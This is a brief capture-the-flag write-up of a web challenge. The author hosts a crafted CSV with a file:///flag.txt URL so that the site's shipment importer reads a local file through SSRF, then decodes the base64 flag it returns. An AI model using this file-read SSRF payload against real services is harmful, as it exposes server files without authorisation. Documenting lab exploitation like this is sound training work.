![48c20f559459d2db9370b44f10bd0296.png](ae380703fce14c3f912696e10200e8ad.png) We have access to a few new things now that we're logged in **Import Shipments** and **Server Configuration** are the two that work on the page. ![10d84a3633f2824219c2f1ff6c558865.png](6e1c7421f25644f1b71149c460321632.png) **Import Shipments** takes a url. Passing a valid one like, say, `https://www.tsustyle.com` kicks back ``` Log: Resp: <!doctype html> CSV headers must be : shipmentID,arrival_date,catalogURL Invalid CSV! invalid format! Cannot import records! ``` So we need a **CSV** file that follows those rules. We can write one, example: ``` shipmentID,arrival_date,catalogURL 1,1,1 ``` It's expecting a url in the **CSV** document, maybe there's some **SSRF** going on? The challenge says: `Can you read /flag.txt?`. Maybe, let's try ``` shipmentID,arrival_date<catalogURL 1,1,file:///flag.txt ``` Hosting that on our webserver and sending it to the site it kicks back ``` Log: Resp: shipmentID,arrival_date,catalogURL 1,1,file:///flag.txt Resp: ZmxhZ3tDMG43cjAxX2k1XzRuX2kxMXVzaTBufQo= invalid format! Cannot import records! ``` The `Resp:` field looks like base64 ![035185c1dfa05d79fadc0e384b729bfd.png](fb76ff96301e431294d2d2677262b8df.png) `flag{C0n7r01_i5_4n_i11usi0n}` --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #web #ssrf #ctf Related: